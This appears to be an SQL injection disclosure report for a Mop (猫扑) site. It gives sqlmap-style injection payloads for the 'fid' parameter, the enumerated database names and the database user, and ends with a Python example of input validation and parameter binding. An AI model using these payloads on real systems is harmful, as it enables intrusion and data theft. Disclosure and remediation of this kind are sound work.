SQL injection vulnerability on a Mop (猫扑) site


  A Mop site has an SQL injection vulnerability; the injectable parameter is fid

  Parameter: fid (GET)

  Type: boolean-based blind

  Title: AND boolean-based blind - WHERE or HAVING clause

  Payload: fid=47 AND 1872=1872&aid=908

  Type: error-based

  Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

  Payload: fid=47 AND (SELECT 7959 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(7959=7959,1))),0x7162786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&aid=908

  Type: AND/OR time-based blind

  Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

  Payload: fid=47 AND (SELECT * FROM (SELECT(SLEEP(5)))anib)&aid=908

  Type: UNION query

  Title: MySQL UNION query (NULL) - 52 columns

  Payload: fid=47 UNION ALL SELECT NULL,CONCAT(0x71766b6a71,0x557a59596d4d7661656e,0x7162786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&aid=908

  ---

  [14:38:10] [INFO] the back-end DBMS is MySQL

  back-end DBMS: MySQL 5.0

  Databases

  available databases [14]:

  [*] information_schema

  [*] mop_demo

  [*] mop_entertainment

  [*] mop_entertainment1

  [*] mop_health

  [*] mop_health1

  [*] mop_lady

  [*] mop_lady1

  [*] mop_local

  [*] mop_news

  [*] mop_society

  [*] mop_society1

  [*] mysql

  [*] performance_schema

  User information

  back-end DBMS: MySQL 5.0

  [14:36:46] [INFO] fetching current user

  current user: 'liudutianxia@%'

  [14:36:47] [INFO] fetching current database

  current database: 'mop_lady1'

  Uploading images is inconvenient.

  Remediation

  Filter input, WAF
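
  The filtering fix for a numeric parameter such as fid, as an added example that is not part of the original report (the report does not show the site's server code). The table, column and function names are hypothetical, the sample rows are constructed, and sqlite3 stands in for MySQL so the block runs offline.

```python
import sqlite3

# fid values copied from two of the payloads in the report above.
REPORTED_FID_VALUES = [
    "47 AND 1872=1872",
    "47 AND (SELECT * FROM (SELECT(SLEEP(5)))anib)",
]

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (aid INTEGER, fid INTEGER, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                   [(908, 47, "sample post"), (909, 48, "other post")])
    return db

def fetch_vulnerable(db, fid, aid):
    # Request text is pasted into the statement, so it is parsed as SQL.
    sql = "SELECT title FROM articles WHERE fid=" + fid + " AND aid=" + aid
    return [row[0] for row in db.execute(sql)]

def parse_id(raw):
    # Allow-list for a numeric id: ASCII decimal digits only, bounded length.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 10):
        raise ValueError("id must be a decimal integer")
    return int(raw)

def fetch_hardened(db, fid, aid):
    # Validate, then bind as parameters so the values never become SQL text.
    sql = "SELECT title FROM articles WHERE fid=? AND aid=?"
    return [row[0] for row in db.execute(sql, (parse_id(fid), parse_id(aid)))]

def rejected_by_hardened(db, values):
    # Returns the inputs that the hardened path refuses before any query runs.
    rejected = []
    for value in values:
        try:
            fetch_hardened(db, value, "908")
        except ValueError:
            rejected.append(value)
    return rejected

if __name__ == "__main__":
    db = make_db()
    print(fetch_vulnerable(db, REPORTED_FID_VALUES[0], "908"))  # SQL was executed
    print(fetch_hardened(db, "47", "908"))
    print(rejected_by_hardened(db, REPORTED_FID_VALUES))
```

  Validation plus parameter binding is what removes the injection; a WAF in front of the application is a second layer, not a substitute.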
